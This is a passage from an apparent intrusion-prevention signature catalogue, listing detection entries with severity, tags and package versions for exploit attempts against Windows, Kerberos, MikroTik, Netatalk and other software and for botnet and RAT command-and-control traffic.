Generic_CS-Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-795-5211
Last changed: sgpkg-ips-795-5211
Vulnerability: Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass
Description:
Back to top

Generic_CS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2023-09, CVE2023, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
Description:
Back to top

Generic_CS-Microsoft-Windows-DHCP-Server-Failover-DoS

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, CVE2019, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: Microsoft-Windows-DHCP-Server-Failover-DoS
Description:
Back to top

Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1765-5242
Last changed: sgpkg-ips-1777-5242
Vulnerability: MS-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read
Description:
Back to top

Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2019-07, CVE2019, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution
Description:
Back to top

Generic_CS-Microsoft-Windows-Kerberos-KDC-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, MS2014-11, CVE2014, Windows 2003 not specific, Windows Vista not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-931-5242
Vulnerability: Microsoft-Windows-Kerberos-KDC-Privilege-Escalation
Description:
Back to top

Generic_CS-Microsoft-Windows-Message-Queuing-Service-CVE-2025-21285-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, CVE2025, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Microsoft-Windows-MQ-Service-CVE-2025-21285-Null-Pointer-Dereference
Description:
Back to top

Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2023, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769
Description:
Back to top

Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2023, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302
Description:
Back to top

Generic_CS-Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1483-5242
Last changed: sgpkg-ips-1483-5242
Vulnerability: Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution
Description:
Back to top

Generic_CS-Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Network File System detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability
Description:
Back to top

Generic_CS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2013-02, CVE2013, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-511-5211
Vulnerability: Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Description:
Back to top

Generic_CS-Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Remote Desktop detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Remote Desktop, CVE2019, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Microsoft-Windows-Remote-Desktop-Connection-Attempt

About this situation: Microsoft Windows Remote Desktop remote control software usage detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-927-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Usage
Description:
Back to top

Generic_CS-Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service

About this situation: A Microsoft Windows Remote Desktop Protocol Denial of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Remote Desktop, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service
Description:
Back to top

Generic_CS-Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Remote Desktop Services detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Remote Desktop, CVE2019, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1190-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows TLS library detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Vulnerability: Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
Description:
Back to top

Generic_CS-Microsoft-Windows-Vulnerability-CVE-2017-0016

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-851-5242
Vulnerability: Microsoft-Windows-Vulnerability-CVE-2017-0016
Description:
Back to top

Generic_CS-Microsoft-WSDAPI-Memory-Corruption-MS09-063

About this situation: An attempt to exploit a vulnerability in Microsoft Web Services on Devices API detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows Vista, Windows 2008, Any Hardware, MS2009-11, CVE2009, Windows Vista not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-264-3038
Vulnerability: Microsoft-WSDAPI-Memory-Corruption-MS09-063
Description:
Back to top

Generic_CS-MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445

About this situation: An attempt to exploit a vulnerability in MikroTik detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MikroTik, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1751-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445
Description:
Back to top

Generic_CS-MikroTik-RouterOS-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in MikroTik RouterOS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MikroTik, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Vulnerability: MikroTik-RouterOS-Authentication-Bypass
Description:
Back to top

Generic_CS-MiniUPnP-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a MiniUPnP Stack Based Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MiniUPnP, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: MiniUPnP-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Mirai-Botnet-C-And-C-Traffic

About this situation: Mirai botnet traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Mirai-Botnet
Description:
Back to top

Generic_CS-Mirai-Botnet-C-And-C-Traffic-2

About this situation: Mirai botnet traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Mirai-Botnet
Description:
Back to top

Generic_CS-Mirai-Botnet-C-And-C-Traffic-3

About this situation: Mirai botnet traffic detected / Soanciphar variant
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Mirai-Botnet
Description:
Back to top

Generic_CS-Mirai-Botnet-C-And-C-Traffic-4

About this situation: Mirai botnet traffic detected / Satori variant
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Mirai-Botnet
Description:
Back to top

Generic_CS-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos 5 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
Description:
Back to top

Generic_CS-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service

About this situation: An MIT Kerberos 5 Invalid RFC 1964 Token Denial of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
Description:
Back to top

Generic_CS-MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos 5 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service
Description:
Back to top

Generic_CS-MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in MIT Kerberos 5 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference
Description:
Back to top

Generic_CS-MIT-Kerberos-5-KDC-Null-Pointer-Dereference

About this situation: An MIT Kerberos 5 KDC Null Pointer Dereference vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: MIT-Kerberos-5-KDC-Null-Pointer-Dereference
Description:
Back to top

Generic_CS-MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service

About this situation: An MIT Kerberos 5 KDC TCP Handling Denial of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service
Description:
Back to top

Generic_CS-MIT-Kerberos-5-Recvauth-Invalid-Memory-Access

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2014, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Vulnerability: MIT-Kerberos-5-Recvauth-Invalid-Memory-Access
Description:
Back to top

Generic_CS-MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service

About this situation: An MIT Kerberos 5 SPNEGO Acceptor acc_ctx_cont Denial of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service
Description:
Back to top

Generic_CS-Mobile-Mouse-RCE

About this situation: An attempt to exploit a vulnerability in Mobile Mouse Server detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Mobile Mouse Server, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1514-5242
Vulnerability: Mobile-Mouse-RCE
Description:
Back to top

Generic_CS-Momentum-Botnet-C-And-C-Traffic

About this situation: Momentum botnet traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Momentum-Botnet
Description:
Back to top

Generic_CS-MongoDB-Unauthenticated-Remote-Database-Drop

About this situation: An attempt to exploit a MongoDB Unauthenticated Remote Database Drop vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, MongoDB, Windows not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-947-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: MongoDB-Unauthenticated-Remote-Database-Drop
Description:
Back to top

Generic_CS-Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615

About this situation: An attempt to exploit a vulnerability in Mosca detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Mosca, CVE2018, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Vulnerability: Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615
Description:
Back to top

Generic_CS-MS-Windows-RDP-Vulnerability-CVE-2015-2373

About this situation: A remote code execution vulnerability in Microsoft Windows RDP server.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2015-07, CVE2015, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Windows-Remote-Desktop-Protocol-Vulnerability-CVE-2015-2373
Description:
Back to top

Generic_CS-MSRPC-Big-Endian-Byte-Order-Used

About this situation: Big endian byte order detected in MSRPC requests, possible IDS evasion attempt
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: MSRPC-Big-Endian-Byte-Order-Used
Description:
Back to top

Generic_CS-MSRPC-Small-Fragments-Used

About this situation: Detects MSRPC traffic over TCP using small fragments
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Windows not specific, Attack Related Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-518-5211
Vulnerability: MSRPC-Small-Fragments-Used
Description:
Back to top

Generic_CS-Multiple-Schneider-Electric-Products-Denial-Of-Service

About this situation: A vulnerability in multiple Schneider Electric products allowing denial of service.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Schneider Electric, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Multiple-Schneider-Electric-Products-Denial-Of-Service
Description:
Back to top

Generic_CS-Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service

About this situation: A Multiple Vendor TCP Timestamp Option Denial of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service
Description:
Back to top

Generic_CS-Mystic-Stealer-Malware-C2-Traffic

About this situation: An attempt to exploit a vulnerability in Mystic Stealer Malware detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Mystic Stealer Malware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1603-5242
Last changed: sgpkg-ips-1603-5242
Vulnerability: Mystic-Stealer-Malware-C2-Traffic
Description:
Back to top

Generic_CS-Mytob-Traffic

About this situation: Possible MyTob traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Mytob
Description:
Back to top

Generic_CS-Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios Remote Plugin Executor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios Remote Plugin Executor, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-528-5211
Vulnerability: Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution
Description:
Back to top

Generic_CS-Nagios-Remote-Plugin-Executor-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios Remote Plugin Executor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios Remote Plugin Executor, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Nagios-Remote-Plugin-Executor-Command-Injection
Description:
Back to top

Generic_CS-Nanopool-Claymore-Dual-Miner-RCE

About this situation: An attempt to exploit a vulnerability in Nanopool Claymore Dual Miner detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Claymore Dual GPU Miner, CVE2018, Windows not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1117-5242
Vulnerability: Nanopool-Claymore-Dual-Miner-RCE
Description:
Back to top

Generic_CS-Nessus-Vulnerability-Scanner-Usage

About this situation: Detects MSRPC requests made by the Nessus vulnerability scanner
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Nessus, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

Generic_CS-Netatalk-Dsi_Ppensession-Attention-Quantum-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Netatalk detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Netatalk, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Netatalk-Dsi_opensession-Attention-Quantum-Out-Of-Bounds-Write
Description:
Back to top

Generic_CS-Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Netatalk detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Netatalk, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1562-5242
Last changed: sgpkg-ips-1562-5242
Vulnerability: Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability
Description:
Back to top

Generic_CS-Netcat-Stack-Buffer-Overflow

About this situation: An attempt to exploit a Netcat Stack Buffer Overflow vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Vulnerability: Netcat-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in NetGain Systems Enterprise Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, NetGain Systems Enterprise Manager, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1069-5242
Vulnerability: Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization
Description:
Back to top

Generic_CS-NetSupport-Manager-Client-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NetSupport Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Solaris, Linux, Mac OS X, Any Hardware, NetSupport Manager, CVE2011, Solaris not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: NetSupport-Manager-Client-Buffer-Overflow
Description:
Back to top

Generic_CS-NetWire-RAT-Infection-Traffic

About this situation: NetWire RAT infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: NetWire-RAT-Infection-Traffic
Description:
Back to top

Generic_CS-NFS-utils-TCP-Connection-Termination-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux NFS Project nfs-utils detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, linux NFS utils, CVE2004, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: NFS-utils-TCP-Connection-Termination-Denial-Of-Service
Description:
Back to top

Generic_CS-Nitol-Activity

About this situation: Nitol activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1286-5242
Vulnerability: Nitol
Description:
Back to top

Generic_CS-Nitol-Activity-2

About this situation: Nitol activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
